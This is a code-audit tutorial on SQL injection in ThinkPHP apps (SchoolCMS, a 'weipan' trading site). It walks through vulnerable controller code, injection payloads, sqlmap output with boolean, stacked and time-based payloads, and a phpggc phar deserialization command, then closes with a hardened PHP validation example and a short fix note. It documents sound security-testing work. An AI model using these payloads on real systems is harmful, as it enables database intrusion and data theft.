MVC PHP Code Audit 4: Frameworks, SQL Injection
How to tell whether a framework is in use:
search for "version" or THINK_VERSION
look at the coding conventions
look at the file names
Case 1: SchoolCMS SQL injection (framework-version vulnerability)
Creating the file: you have to decide for yourself which directory to write into; in my case it was /Runtime/Cache. Once created, it was in.
Default credentials: admin / schoolcms
Clicking an article on the right, I found:
http://localhost:910/index.php?m=Home&c=Article&a=Index&id=6
public function Index()
{
    $m = M('Article');
    // the condition value comes straight from I('id'), which can also be an array (id[where]=..., id[table]=...)
    $article = $m->where(array('id'=>I('id'), 'is_enable'=>1))->find();
    if(!empty($article['content']))
    {
        // access statistics
        $m->where(array('id'=>I('id')))->setInc('access_count');
    }
}
M('Article') specifies the table name.
The default find() method is used.
const THINK_VERSION = '3.2.3'; this is the version.
In this version find() has an SQL injection vulnerability.
id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1 (result: did not work)
Application/Admin/Controller/AdminController.class.php: let's switch to this file and test its code instead.
public function SaveInfo()
{
    // login check
    $this->Is_Login();
    // when not operating on one's own account
    if(I('id') != $this->admin['id'])
    {
        // permission check
        $this->Is_Power();
    }
    // user edit
    $id = I('id');
    if($id > 0)
    {
        // ... rest of the method omitted in the original
    }
}
http://localhost:910/index.php?m=admin&c=Article&a=SaveInfo&id=6
Since the value is numeric, no quotes are needed.
http://localhost:910/index.php?m=admin&c=Article&a=SaveInfo&id[where]=6 and sleep(2)# (error-based is not an option here because error display is not enabled)
It did delay.
Run it through sqlmap:
GET /index.php?m=admin&c=Article&a=SaveInfo&id[where]=1* HTTP/1.1
Host: 192.168.1.56:910
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: think_language=en-US; PHPSESSID=36ijnbi7on3o87iu9t7nt9bd9t
python sqlmap.py -r 1234.txt
erun with the '--tamper=between'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 393 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://192.168.1.56:910/index.php?m=admin&c=Article&a=SaveInfo&id[where]=1 AND 3941=3941
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: http://192.168.1.56:910/index.php?m=admin&c=Article&a=SaveInfo&id[where]=1;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.1.56:910/index.php?m=admin&c=Article&a=SaveInfo&id[where]=1 AND (SELECT 2987 FROM (SELECT(SLEEP(5)))YRrr)
---
[10:40:20] [INFO] the back-end DBMS is MySQL
web application technology: ThinkPHP, Apache 2.4.39
back-end DBMS: MySQL >= 5.0.12
[10:40:21] [INFO] fetched data logged to text files under 'C:\Users\22118\AppData\Local\sqlmap\output\192.168.1.56'
[10:40:21] [WARNING] your sqlmap version is outdated
Case 2: weipan, unsafe SQL syntax in the backend
index/controller/Goods.php
http://localhost:912/index/Goods/ajaxkdata/tokenpid/1 and 1=1
where('pid='.$pid
('uid',$uid)->find()
$user = Db::name('userinfo')->where('uid',$uid)->find(); this is the parameterized form, joining field and value with a comma.
But in the same file I found a condition joined with ., which may be a vulnerability:
public function ajaxkdata()
{
    // fetch the K-line (candlestick) chart data and convert it to an array
    $pid = input('param.pid');
    // the request value is concatenated into the SQL text instead of being bound
    $data = Db::name('productdata')->where('pid='.$pid)->find();
    $newdata = array();
    if($data){
        $data['UpdateTime'] = $data['UpdateTime'];
        $newdata[0]['price'] = $data['Price'];
        $newdata[0]['open'] = $data['Open'];
        $newdata[0]['close'] = $data['Close'];
        $newdata[0]['lowest'] = $data['Low'];
        $newdata[0]['highest'] = $data['High'];
        $newdata[0]['time'] = $data['UpdateTime'].'000';
        $newdata[0]['fulltime'] = date('Y-m-d H:i:s',$data['UpdateTime']);
        $newdata[0]['goodtime'] = date('Y-m-d H:i:s',$data['UpdateTime']);
    }
    // ... rest of the method omitted in the original
}
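As an added example (not code from SchoolCMS, weipan or ThinkPHP), here is the hardened counterpart of both patterns above: validate_id() rejects the array-form id[where]=... input that I('id') hands to where() in case 1 and the non-numeric strings that where('pid='.$pid) concatenates in case 2, and the query binds the value instead of splicing it. It assumes PHP 7.1+ with the pdo_sqlite extension; the table and rows are constructed in the script, and the ThinkPHP equivalents are I('id', 0, 'intval') and the comma form where('pid', $pid) noted above.

```php
<?php
// Added example, not SchoolCMS/weipan/ThinkPHP code. The table and rows are
// constructed here (SQLite in memory) so the script runs offline.

// Return $raw as a positive int, or null for anything else. This stops both
// input shapes from the audit: array values (id[where]=..., id[table]=...,
// which I('id') in ThinkPHP 3.2.3 passes into where() as an operator array)
// and non-numeric strings ("1 and 1=1", "6 and sleep(2)#") that the
// concatenated where('pid='.$pid) forwards into the SQL text unchanged.
function validate_id($raw): ?int
{
    if (is_array($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened counterpart of where('pid='.$pid): the value is bound as an
// integer parameter, never spliced into the query string.
function find_product(PDO $db, $rawPid): ?array
{
    $pid = validate_id($rawPid);
    if ($pid === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT pid, Price, Open, Close, Low, High FROM productdata WHERE pid = :pid');
    $stmt->bindValue(':pid', $pid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed stand-in for the productdata table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE productdata (pid INTEGER PRIMARY KEY, Price REAL, Open REAL, Close REAL, Low REAL, High REAL)');
$db->exec('INSERT INTO productdata VALUES (1, 10.5, 10.0, 10.5, 9.8, 10.7)');

// Inputs in the shapes the audit used: plain id, array-form id, concatenated condition.
$inputs = ['1', ['where' => '6 and sleep(2)#'], '1 and 1=1', '0'];
foreach ($inputs as $in) {
    $label = is_array($in) ? 'array:' . json_encode($in) : $in;
    $row = find_product($db, $in);
    printf("%-35s -> %s\n", $label, $row === null ? 'rejected' : 'pid ' . $row['pid']);
}
```

Only the plain numeric id reaches the database; the array form and both concatenated conditions are rejected before any SQL is built.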
This version also has the phar vulnerability; the version is 5.0.24.
./phpggc ThinkPHP/FW1 <target directory> <local file> -p phar -o test.phar
/index/getdata/mkdirs?dir=phar://test.png
ThinkPHP 5.0.24: MySQL brute-forcing leaks the password
In this source version, when the MySQL server accepts remote connections and error reporting is enabled, the password can be recovered by brute force.
The reason is that ThinkPHP has a connection file; repeatedly failing connections throw an exception that exposes it.
Fix: turn debug off and comment out the connection-file code.